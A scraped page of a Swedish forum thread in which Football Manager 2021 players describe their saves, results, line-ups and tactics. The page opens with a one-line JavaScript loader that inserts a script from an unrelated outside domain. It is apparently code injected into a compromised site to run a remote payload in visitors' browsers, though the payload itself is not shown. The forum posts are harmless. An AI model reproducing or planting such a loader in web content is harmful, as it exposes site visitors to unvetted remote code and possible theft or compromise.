;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Vilket lag är du? Hur går det? – Sida 3 – Football Manager 2021 – FMSweden Forum
Meny Stäng

Vilket lag är du? H...

Share:
Notifications
Clear all

Vilket lag är du? Hur går det?

324 Inlägg
79 Users
472 Reactions
23.1 K Visningar
zXc
 zXc
(@zxc)
Estimable Member

@musicmanvic

Så du menar att du kom 1-4 första säsongen med Sheffield United? 
Och till CL-final andra? 
Sounds fishy ? 

SvaraCitera
(@musicmanvic)
Active Member

@zxc
Tro vad du vill men det stämmer faktiskt. Torskade dock cl-finalen rätt stort. Men hade tur med lottning innan med Zenit och Monaco på vägen fram. 

SvaraCitera
MaximTsigalko
(@maximtsigalko)
Eminent Member

Lazio

20/21: 5e plats i ligan

21/22: 2a i ligan

22/23: 1a i ligan

23/24: 2a i ligan

24/25: 1a i ligan och Italienska cupen

Startelvan

Målvakt: Luis Maximiano
Mittback: Upamecano
Mittback: Papetti
Mittback: Acerbi
Offensiv ytterback höger: Alexander-Arnold (c)
Offensiv ytterback vänster: Pellegrini
Deffensiv spelfördelare: Ajer
Löpstark mittfältare: Florentino Luis
Offensiv mittfältare: Fekir
Djupt liggande forward: Arezo
Offensivt spelande forward: Savio

Taktiken:

Startade min save med att spela en 4-2-3-1 men tyckte att vi släppte in alldeles för många och enkla mål. Gick över till en 5-3-2 efter den andra säsongen, och efter det så har det gått otroligt bra! Snabbet är nyckeln i årets FM, samt så har jag märkt att man kan spela otroligt aggressivt och tackla hårt utan att bli straffad. Har knappt fått några kort alls, och har endast ett rött kort efter fem säsonger. Det tråkiga är dock att trots att jag får så otroligt många straffar, så resulterar knappt hälften i mål...

Spelarna:

Hade Donnarumma som keeper fram till dess att han började klaga om att få gå till en bättre klubb. Acerbi är som Chiellini, 37 bast men håller fortfarande världsklass och leder försvaret med bravur. Säsongen 23/24 så såg jag att Trent Alexander-Arnold var transferlistad (???) och överflödig i Liverpools trupp, och eftersom jag behövde en bra högerytter, och styrelsen klagat på att jag inte värvat profilspelare, så blev det ett köp för 830 miljoner sek. 

På mitten så fick Tonali styra och ställa under ett par säsonger, innan även han ville bort från klubben. Värvade Camavinga som ersättare, men fick tillslut ett sjukt bud från Liverpool som jag inte kunde tacka nej till. Tyvärr så vill våra bästa spelare alltid vidare till andra klubbar, och jag är inte den som säger nej för jag pallar inte ha en massa gnällspikar i mitt lag. Dra åt helvete till PSG eller Barca och ruttna på deras bänk om ni nu vill det... 

Savio och Arezo bombar in mål åt oss, men båda två skadade sig i slutskedet av säsongen, så vi kunde tyvärr inte nå hela vägen i CL. Vi har spelat en CL final, en Europa league final, samt en VM för klubblags final, men förlorat alla tre. Rekommenderar alla att kolla in just Savio från "ATM", han är endast 21 år gammal nu och har lekstuga varje match, vilket har belönat honom med en plats i Brasiliens landslag. 

Men framtiden är ljus. Vi har värvat en hel drös med sjuka regens som nu knackar på dörren till a-laget. Ja det vill säga om inte Liverpool eller Bayern Munchen kommer och skapar oreda i laget, och jag blir tvungen att sälja...

SvaraCitera
zXc
 zXc
(@zxc)
Estimable Member

@maximtsigalko

När värvade du Savio? Och vad fick du pröjsa?

SvaraCitera
MaximTsigalko
(@maximtsigalko)
Eminent Member

@zxc han hade precis fyllt 18, och hade en klausul på 300 miljoner kr! Nu är Barca, Liverpool, PSG och Bayern ute efter hans signatur... standard! 

zXc reacted
SvaraCitera
Armada
(@armada)
Trusted Member

Queen's Park F.C. 20/21. Scottish League 2: 1:a. Målsättningen för första säsongen var att vinna serien vilket vi gjorde ganska så enkelt. Det bestämdes även att man skulle flytta till en annan arena nästa säsong, ett stenkast ifrån den gamla och där den nya rymmer 2000 åskådare. 

Queen's Park F.C. 21/22. Scottish League 1: 1:a. Även denna säsong så var målsättningen att vinna ligan. Förlorade endast 1 match av 37 i ligan samt vann Skotska-Cupen vilket gjorde att jag var klar för kval till Europa League, där blev jag lottad att möta RSC Anderlecht.

Allt detta blev möjligt mycket tack vare mitt nyförvärv för säsongen Beto.

"Oi bruv, three pints a lagar and a pint a guiness." - Bret Clement's greeting to pretty much everyone.

MacCcaFlow reacted
SvaraCitera
Samaras
(@samaras)
Active Member

Då jag alltid har svårt att välja lag att köra med och gillar att börja i Div 2 i Sverige och sedan bygga mig uppåt, så valde jag att simulera halva första säsongen och sedan välja något av de lagen som låg på nedflyttningsplats i någon Div 2-serie. Friska Viljor FC blev valet som låg näst sist i sin serie med endast 10 intjänade poäng på 13 matcher. Sen tog jag över och andra halvan gick rätt mycket bättre, tog nämligen 27 poäng på de sista 13 matcherna och "vann" därmed andra halvan på säsongen.

Säsong 2 var jag och Bodens BK storfavoriter att vinna och med 7 vinster på de inledande 7 matcherna så fick man sig ett litet försprång direkt. Trots en liten dipp efter det med endast 3 vinster och 1 oavgjord de nästkommande 9 matcherna så var det inga problem att ta sig upp till Div 1 när man plockade hem 9 vinster och 1 oavgjord de sista 10 matcherna. 

Nu är det försäsong till tredje säsongen och laget är i stort sett intakt från förra säsongen med endast 3 nyförvärv (gillar att skynda långsamt). Mediatipset inför säsongen är en niondeplats så vi får se hur det går.

This post was modified 4 år sedan by Samaras

MacCcaFlow and raca14 reacted
SvaraCitera
(@emilnr15)
New Member

Drog igång min save som jag har tänkt ska bli min långkörare på årets spel. Skapade ett lag i längst ner i Engelska seriesystemet. Inga spelare eller ledare i klubben och tippade att komma sist i serien. Gav dem en ekonomi som var någonstans mellan bottenlag och mitten lag i serien. Laget döptes till London Athletics och har inlett säsongen med att få ihop en tränarstab som är okej där jag själv börjar med så lite stats som möjligt där jag ska utvecklas i takt med klubben. Lyckades även få ihop en trupp på 16 spelare inför första matchen och har nu spelat 7 matcher och har 6 vinster och 1 förlust. 

Nästa uppdrag är att försöka fixa en logga till klubben och hemma, borta och tredjeställ så saven blir mer levande! Come on Athletics! 

MacCcaFlow and TommyE reacted
SvaraCitera
MaximTsigalko
(@maximtsigalko)
Eminent Member

Hann precis med att vinna allt som går att vinna med Lazio på min beta save, så tyckte att det var dags för en riktig utmaning. 

Startade en ny save igår med Inter! Men inte vilket Inter som helst... nämligen Inter de Madrid, eller "Dux Internacional de Madrid" som dom egentligen heter. 

Spelar i spanska tredje divisionen med en liten lönebudget på 200 000 kr p/v och har 0kr att handla spelare för. 

Ska försöka bli Madrids bästa lag. Men räknar med att det kommer ta en 10+ säsonger innan jag kan utmana Real Madrid och Atletico de Madrid. 

MacCcaFlow reacted
SvaraCitera
Supersub
(@supersub)
Eminent Member

Rullat på med en "beta-save" för att känna på spelet. I vanlig ordning blir första saven med United. Har nu avverkat två säsonger och startat igång säsong 3. Har nu plockat hem alla titlar som går.

Säs 1: PL, Fa, Liga cup.
Säs 2: CS, PL, CL, Liga cup, VM för klubblag.

Säs 3: så här långt har jag hunnit med CS och Europeiska supercupen.

Spelade säsong 1 en klassisk 4-3-3. Testade mig fram och säsong 2 spelade vi en 4-4-2 med inverterade yttrar och extremt offensiva ytterbackar. Gick ruggigt bra och vi klämde in 100 baljor på de 38 ligamatcherna. Säs 3 går vi nu för en 4-2-3-1 men mer kontrollerat än offensivt som varit receptet säs 1 och 2. Blir att avverka säsong 3 medans jag funderar på vad som ska göras på nästa save. 

SvaraCitera
(@tubinho)
New Member

Min "riktiga" första save på FM21 blev Giffarna från Sundsvall där mitt första mål blir att avancera till allsvenskan för att sedan gå för guldet och erövra Europa.

Min challenge blir att enbart använda sig av spelare som är födda i en Norrländsk stad alternativt egenfostrade i ungdomsakademin. 

Har hittills spelat 11 matcher med 10 segrar och 1 förlust på kontot (GAIS 2-3). En bra start med andra ord. År två kommer jag slussa ut spelare som inte är födda i Norrland eller fostrade i Giffarnas ungdomsakademi. 

This post was modified 4 år sedan by Tubinho

Andreas_N and Marsun19 reacted
SvaraCitera
MaximTsigalko
(@maximtsigalko)
Eminent Member

Postad av: @maximtsigalko

Hann precis med att vinna allt som går att vinna med Lazio på min beta save, så tyckte att det var dags för en riktig utmaning. 

Startade en ny save igår med Inter! Men inte vilket Inter som helst... nämligen Inter de Madrid, eller "Dux Internacional de Madrid" som dom egentligen heter. 

Spelar i spanska tredje divisionen med en liten lönebudget på 200 000 kr p/v och har 0kr att handla spelare för. 

Ska försöka bli Madrids bästa lag. Men räknar med att det kommer ta en 10+ säsonger innan jag kan utmana Real Madrid och Atletico de Madrid. 

Lyckades med att ta mig upp en division med Inter de Madrid, men fick kicken halvvägs in i säsong 2. Vår ekonomi gjorde att jag inte kunde värva några spelare, dessutom hade styrelsen lite väl optimistiska mål för oss, så jag fick tyvärr kicken tillslut efter att vi legat näst sist när halva säsongen hade spelats. Nåja... känns lagom surt men vet inte vad jag hade kunnat göra annorlunda. 

Funderar på om jag ska börja om med Inter igen eller om jag ska försöka med något "lättare" lag... 

SvaraCitera
Argt Troll
(@argt-troll)
Reputable Member

@maximtsigalko Vore dumt och ge upp redan nu! Tycker du ska göra en ny manager på befintlig save.

SvaraCitera
Cafeolivedal (fd ifkgbg1904)
(@cafeolivedal)
New Member

Började lira med Hamburger SV på betan.

Tippade att sluta 5:a i Bundesliga 2 första säsongen.

Vann ligan med 3 poäng & +16 i målskillnad. 

Tippad att slåss febrilt mot nedflyttning säsong 2. Slutar 3:a i ligan då jag hade chans på ligaseger fram till sista omgången där jag torskade mot FC Bayern som blev mästare.

SvaraCitera
(@sjukahauge)
Active Member

Jag valde i vanlig ordning att hitta ett lag i lägre engelska divisionerna. På FM19 hade jag en långkörare med Dover som jag lyckades ta hela vägen upp till PL och även vinna Europa League.

Detta året föll valet på Chester, en klubb som varit uppe i L1 och L2 i fornstora dagar men som för närvarande ligger i Vanrama League South.
Vi bottlar seriesegern första säsongen när vi tar 2 poäng sista 5 matcherna, men lyckas trots allt kvala oss upp till Vanrama National League. 

Har givetvis plockat in en del unga talanger som större klubbar släppt under sommaren. Utveckla och sälja, samtidig som vi ska försöka fortsätta vår resa uppåt i seriesystemet. 

20 matcher in på andra säsongen så ligger vi på en stabil 4:e plats i en tight tabell. Så målsättningen har blivit att försöka komma top 6 så vi åtminstone får chansen att kvala upp till League 2.

Får se om jag bemödar mig att trycka in lite bilder på mina största talanger nästa post 🙂

MacCcaFlow reacted
SvaraCitera
zXc
 zXc
(@zxc)
Estimable Member

@sjukahauge

Upp med dem bara! 

SvaraCitera
(@nixxy)
Active Member

I sluttampen på säsongen 2026 nu med Bajen. Vunnit 5 raka ligatitlar (2 säsonger som obesegrade) och har just nu 58 allsvenska matcher i rad utan förlust. Vi vann även Europa League i år och lyckades sen besegra Real Madrid i Supercupen. Har även 4 cupguld. 

Ordinarie elva i dagsläget:

Emil Larsson*

Andrés* - Odin Björtuft - Iosif Maruntelu* - Tyrick Mitchell

Aimar Sher - Vasco Sousa

Benjamin Nygren - Charles Camara* - Jesper Karlsson

Cesar Vallejo*

*= Regens

Emil Larsson och Charles Camara är helt egna produkter som jag fått upp i akademin. Aimar Sher är den enda som vart med sen säsong 1 och fortsatt är vår viktigaste spelare.
Björtuft och Maruntelu har bildat mittlås sen säsong två och står för den stora kontinuiteten tillsammas med Sher. 

This post was modified 4 år sedan 2 times by Nixxy

SvaraCitera
Kenka
(@kenka)
Eminent Member

@nixxy Kan man få en screenshot på Aimar?

SvaraCitera
(@fasteddy)
Eminent Member

Kör en save med Sociedad och jag kan verkligen rekommendera det! Rolig klubb med Isak på topp och flera egna produkter i lagets stomme. Jag skulle dock vilja ha lite tips o råd på baskiska spelare att värva? Eller andra spanska talanger 🙂

Andreas_N reacted
SvaraCitera
(@gabbe)
New Member

Jag är IFK Göteborg och redan på min andra säsong. Jag vann Allsvenskan redan under min första säsong och är tippas 2:a inför 2021 säsongen. Inför första säsongen var vi tippade på 13:e plats.

Ordinarie elva inför säsong 2:

Målvakt: Isak Pettersson

Adam Andersson-Gustav Svensson-Da Graca-Jallow 

Bojanic-Erlingmark

Vecchia-Irandust-Aiesh

Sylisufay

This post was modified 4 år sedan by Gabbe

SvaraCitera
Sida 3 / 17
Share: